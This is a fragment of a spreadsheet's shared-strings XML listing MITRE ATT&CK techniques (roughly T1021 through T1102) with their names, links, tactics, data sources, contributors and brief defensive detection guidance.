  <si>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Command: Command Execution, Logon Session: Logon Session Creation, Module: Module Load, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/003</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</si>
  <si>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</si>
  <si>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Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/001</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</si>
  <si>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</si>
  <si>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Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Logon Session: Logon Session Creation, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1021.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.005</t>
  </si>
  <si>
    <t>Remote Services: VNC</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>Use of VNC may be legitimate depending on the environment and how it’s used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with VNC.</t>
  </si>
  <si>
    <t>T1021.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1018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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Daniel Stepanic, Elastic; RedHuntLabs, @redhuntlabs</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>Replication Through Removable Media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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>Initial Access, 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</si>
  <si>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</si>
  <si>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Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1496</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Alfredo Oliveira, Trend Micro; David Fiser, @anu4is, Trend Micro; Jay Chen, Palo Alto Networks; Magno Logan, @magnologan, Trend Micro; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>Rogue Domain Controller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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Creation, Active Directory: Active Directory Object Modification, Network Traffic: Network Traffic Content, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>Rootkit</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Application control by file name or path, File monitoring, Host intrusion prevention systems, Signature-based detection, System access controls</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Scheduled Task/Job</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>Execution, Persistence, Privilege Escalation</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</si>
  <si>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</si>
  <si>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Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>Alain Homewood, Insomnia Security; Leo Loobeek, @leoloobeek; Prashant Verma, Paladion; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1053.001</t>
  </si>
  <si>
    <t>Scheduled Task/Job: At (Linux)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/001</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</si>
  <si>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</si>
  <si>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Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>Scheduled Task/Job: At (Windows)</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/002</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</si>
  <si>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</si>
  <si>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File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/007</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</si>
  <si>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</si>
  <si>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 Container Creation, File: File Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Cron</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1053.004</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Launchd</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/004</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Scheduled Task</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1053/005</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</si>
  <si>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</si>
  <si>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T1053.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1029</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1113</t>
  </si>
  <si>
    <t>Screen Capture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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1597</t>
  </si>
  <si>
    <t>Search Closed Sources</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1597.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1597.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1596</t>
  </si>
  <si>
    <t>Search Open Technical Databases</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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1596.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1596.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1596.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1596.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1596.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1593</t>
  </si>
  <si>
    <t>Search Open Websites/Domains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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1593.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1593.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1594</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1505</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505</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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1505.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation: NetSPI Startup Stored Procedures) Consider enabling audit features that can log malicious startup activities.</t>
  </si>
  <si>
    <t>Carlos Borges, @huntingneo, CIP; Kaspersky; Lucas da Silva Pereira, @vulcanunsec, CIP</t>
  </si>
  <si>
    <t>T1505.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, File: File Creation</t>
  </si>
  <si>
    <t xml:space="preserve"> Christoffer Strömblad; ESET</t>
  </si>
  <si>
    <t>T1505.003</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1505/003</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</si>
  <si>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</si>
  <si>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T1489</t>
  </si>
  <si>
    <t>Service Stop</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1129</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1218</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1218</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, Module: Module Load, Network Traffic: Network Connection Creation, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Hans Christoffer Gaardløs; Nishan Maharjan, @loki248; Praetorian</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1218.003</t>
  </si>
  <si>
    <t>Signed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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Nik Seetharaman, Palantir; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>T1218.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application control, Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1218.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>ESET</t>
  </si>
  <si>
    <t>T1218.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1218.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Ricardo Dias; Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Msiexec</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>Alexandros Pappas</t>
  </si>
  <si>
    <t>T1218.008</t>
  </si>
  <si>
    <t>Signed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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1218.009</t>
  </si>
  <si>
    <t>Signed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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1218.010</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1218.011</t>
  </si>
  <si>
    <t>Signed Binary Proxy Execution: Rundll32</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Casey Smith; Ricardo Dias</t>
  </si>
  <si>
    <t>T1218.012</t>
  </si>
  <si>
    <t>Signed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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1216</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1216</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1216.001</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution: PubPrn</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1216/001</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools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</si>
  <si>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</si>
  <si>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</si>
  <si>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Execution, Lateral Movement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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Shane Tully, @securitygypsy</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1518.001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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1608</t>
  </si>
  <si>
    <t>Stage Capabilities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</si>
  <si>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</si>
  <si>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</si>
  <si>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Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.</t>
  </si>
  <si>
    <t>T1608.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1608.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1608.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1608/005</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</si>
  <si>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</si>
  <si>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T1608.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1608.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1528</t>
  </si>
  <si>
    <t>Steal Application Access Token</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services); Mark Wee; Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC); Shailesh Tiwary (Indian Army)</t>
  </si>
  <si>
    <t>T1539</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor for attempts to access files and repositories on a local system that are used to store browser session cookies. Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>File: File Access, Process: Process Access</t>
  </si>
  <si>
    <t>Johann Rehberger; Microsoft Threat Intelligence Center (MSTIC)</t>
  </si>
  <si>
    <t>T1558</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1558</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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Credential Request, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1558.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Credential Request</t>
  </si>
  <si>
    <t>Dan Nutting, @KerberToast; Jacques Pluviose, @Jacqueswildy_IT; James Dunn, @jamdunnDFW, EY; Swapnil Kumbhar</t>
  </si>
  <si>
    <t>T1558.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1558.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1558.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1553</t>
  </si>
  <si>
    <t>Subvert Trust Controls</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Autoruns Analysis, Digital Certificate Validation, Process whitelisting, User Mode Signature Validation, Windows User Account Control</t>
  </si>
  <si>
    <t>T1553.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>T1553.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Application control, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Gatekeeper Bypass</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/001</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Metadata, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1553.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1553/004</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</si>
  <si>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</si>
  <si>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Itzik Kotler, SafeBreach; Matt Graeber, @mattifestation, SpecterOps; Red Canary; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Digital Certificate Validation</t>
  </si>
  <si>
    <t>T1553.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.</t>
  </si>
  <si>
    <t>File: File Creation, File: File Metadata</t>
  </si>
  <si>
    <t>Christiaan Beek, @ChristiaanBeek</t>
  </si>
  <si>
    <t>T1553.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Modification, Module: Module Load, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matt Graeber, @mattifestation, SpecterOps</t>
  </si>
  <si>
    <t>Application control, Autoruns Analysis, Digital Certificate Validation, User Mode Signature Validation</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply Chain Compromise</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1195.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1195.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1195.002</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Supply Chain</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1195/002</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1614</t>
  </si>
  <si>
    <t>System Location Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1016</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1016</t>
  </si>
  <si>
    <t>T1016.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1049</t>
  </si>
  <si>
    <t>System Network Connections Discovery</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1049</t>
  </si>
  <si>
    <t>T1033</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>T1007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1569</t>
  </si>
  <si>
    <t>System Services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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>System Services: Launchctl</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1569/001</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</si>
  <si>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</si>
  <si>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Command: Command Execution, File: File Modification, Process: Process Creation, Service: Service Creation</t>
  </si>
  <si>
    <t>T1569.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Command: Command Execution, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1529</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1080</t>
  </si>
  <si>
    <t>Taint Shared Content</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation</t>
  </si>
  <si>
    <t>David Routin; Michal Dida, ESET</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>Template Injection</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1221</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</si>
  <si>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</si>
  <si>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Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>Brian Wiltse @evalstrings; Patrick Campbell, @pjcampbe11</t>
  </si>
  <si>
    <t>Static File Analysis</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>Traffic Signaling</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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>Command And Control, Defense Evasion, Persistence</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Defensive network service scanning</t>
  </si>
  <si>
    <t>T1205.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>T1537</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. </t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Creation, Cloud Storage: Cloud Storage Modification, Snapshot: Snapshot Creation, Snapshot: Snapshot Modification</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1127.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Carrie Roberts, @OrOneEqualsOne</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>Trusted Relationship</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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SaaS, Windows, macOS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>Two-Factor Authentication Interception</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1552</t>
  </si>
  <si>
    <t>Unsecured Credentials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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Access, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1552.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1552/003</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</si>
  <si>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</si>
  <si>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T1552.005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1552.007</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1552.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1552.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1552.006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1552.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1535</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1550</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Defense Evasion, Lateral Movement</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</si>
  <si>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</si>
  <si>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Google Workspace, Office 365, SaaS, Windows</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Credential Request, Application Log: Application Log Content, Logon Session: Logon Session Creation, User Account: User Account Authentication, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>System Access Controls</t>
  </si>
  <si>
    <t>T1550.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs.</t>
  </si>
  <si>
    <t>Google Workspace, Office 365, SaaS</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Web Credential: Web Credential Usage</t>
  </si>
  <si>
    <t>T1550.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Active Directory: Active Directory Credential Request, Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>Blake Strom, Microsoft 365 Defender; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1550.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1550.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
    <t>Johann Rehberger</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>User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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Oleg Skulkin, Group-IB</t>
  </si>
  <si>
    <t>T1204.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1204.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1204/003</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</si>
  <si>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</si>
  <si>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Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start</t>
  </si>
  <si>
    <t>Center for Threat-Informed Defense (CTID); Vishwas Manral, McAfee</t>
  </si>
  <si>
    <t>T1204.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Valid Accounts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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1078</t>
  </si>
  <si>
    <t>Defense Evasion, Initial Access, Persistence, Privilege Escalation</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</si>
  <si>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</si>
  <si>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Mark Wee; Netskope; Praetorian; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>Anti-virus, Application control, Firewall, Host intrusion prevention systems, Network intrusion detection system, System access controls</t>
  </si>
  <si>
    <t>T1078.004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1078/004</t>
  </si>
  <si>
    <t>Monitor the activity of cloud accounts to detect abnormal or malicious behavior, such as accessing information outside of the normal function of the account or account usage at atypical hours.</t>
  </si>
  <si>
    <t>T1078.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Monitor whether default accounts have been activated or logged into. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately.</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Valid Accounts: Domain Accounts</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1078.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1125</t>
  </si>
  <si>
    <t>Video Capture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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1497</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Defense Evasion, Discovery</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Anti-virus, Host forensic analysis, Signature-based detection, Static File Analysis</t>
  </si>
  <si>
    <t>T1497.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1497.003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1497.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1600</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1600.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1600.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1102</t>
  </si>
  <si>
    <t>Web Service</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1102.002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1102.001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1102.003</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</si>
  <si>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</si>
  <si>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</si>
